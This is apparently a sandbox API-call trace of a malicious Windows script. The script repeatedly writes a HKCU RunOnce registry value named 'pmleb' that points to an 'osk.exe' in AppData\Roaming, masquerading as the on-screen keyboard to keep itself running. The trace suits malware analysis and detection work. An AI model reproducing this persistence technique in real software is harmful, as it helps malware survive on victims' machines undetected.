FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0081.220] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.220] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x29 [0081.220] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.221] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0081.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.221] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.221] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.221] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.222] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.222] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.222] RegCloseKey (hKey=0x280) returned 0x0 [0081.222] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.222] SetTimer (hWnd=0x20280, nIDEvent=0x20a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a4 [0081.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.235] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.235] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.235] KillTimer (hWnd=0x20280, uIDEvent=0x20a4) returned 1 [0081.235] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.235] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.235] IUnknown:Release (This=0x787518) returned 0x1 [0081.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.236] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.236] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.236] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0081.236] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.236] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2a [0081.236] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.237] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0081.237] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.237] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.237] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.237] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.237] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.238] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.238] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.238] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.238] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.238] RegCloseKey (hKey=0x280) returned 0x0 [0081.238] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.238] SetTimer (hWnd=0x20280, nIDEvent=0x20a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a5 [0081.239] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.250] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.250] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.250] KillTimer (hWnd=0x20280, uIDEvent=0x20a5) returned 1 [0081.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.251] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.251] IUnknown:Release (This=0x787518) returned 0x1 [0081.251] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.251] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.251] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.251] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.252] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0081.252] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.252] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2b [0081.252] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.253] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0081.253] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.253] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.253] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.253] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.253] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.253] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.253] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.253] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.254] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.254] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.254] RegCloseKey (hKey=0x280) returned 0x0 [0081.254] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.254] SetTimer (hWnd=0x20280, nIDEvent=0x20a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a6 [0081.254] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.266] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.266] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.267] KillTimer (hWnd=0x20280, uIDEvent=0x20a6) returned 1 [0081.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.267] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.267] IUnknown:Release (This=0x787518) returned 0x1 [0081.267] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.267] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.267] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.267] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, 